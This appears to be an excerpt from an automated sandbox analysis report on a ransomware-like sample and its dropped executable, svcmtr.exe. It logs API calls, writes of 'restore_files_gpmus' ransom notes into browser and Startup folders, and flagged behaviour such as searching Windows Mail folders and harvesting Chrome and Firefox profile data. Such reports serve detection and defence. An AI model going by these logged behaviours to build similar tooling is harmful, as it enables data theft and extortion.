Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt VolumeInformation
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0042AE84 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0042AE84
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041D4D0 LoadStringW,LoadStringW,LoadStringW,CoInitializeEx,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,CoCreateInstance,CoCreateInstance,ExitProcess,_memset,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,CreateMutexW,GetLastError,_memset,GetVersionExW,CreateThread,CreateThread,_memset,__wfopen_s,_fprintf,CreateThread,CreateThread,CreateThread,SetThreadPriority,WaitForSingleObject,WaitForSingleObject,_memset,ShellExecuteW,ShellExecuteW,ShellExecuteW,ShellExecuteW,CreateThread,WaitForSingleObject,CreateThread,WaitForSingleObject,0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Overwrites Mozilla Firefox settings
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\safebrowsing\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\safebrowsing\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\restore_files_gpmus.htmlJump to behavior

Stealing of Sensitive Information

barindex
Searches for Windows Mail specific files
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery NULLJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FontLookupTableCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\1.0.0.14\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\blob_storage\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImproved\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\GPUCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\TLSDeprecationConfig\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\61\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Storage\ext\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Thumbnails\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\1.0.6.0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ECSerivceProvidersConfig\1\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\shared_proto_db\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\TLSDeprecationConfig\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImproved\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\js\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\InterventionPolicyDatabase\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ThirdPartyModuleList64\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\8167\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\Encryption\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\js\index-dir\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Thumbnails\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\shared_proto_db\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\8167\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\blob_storage\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\GPUCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ECSerivceProvidersConfig\1\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Storage\ext\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\8167\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ECSerivceProvidersConfig\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\2986\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ThirdPartyModuleList64\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\js\index-dir\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.47.0\LICENSE.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\1.0.6.0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\8167\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\AutofillStrikeDatabase\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\2986\_metadata\restore_files_gpmus.htmlJump to behavior
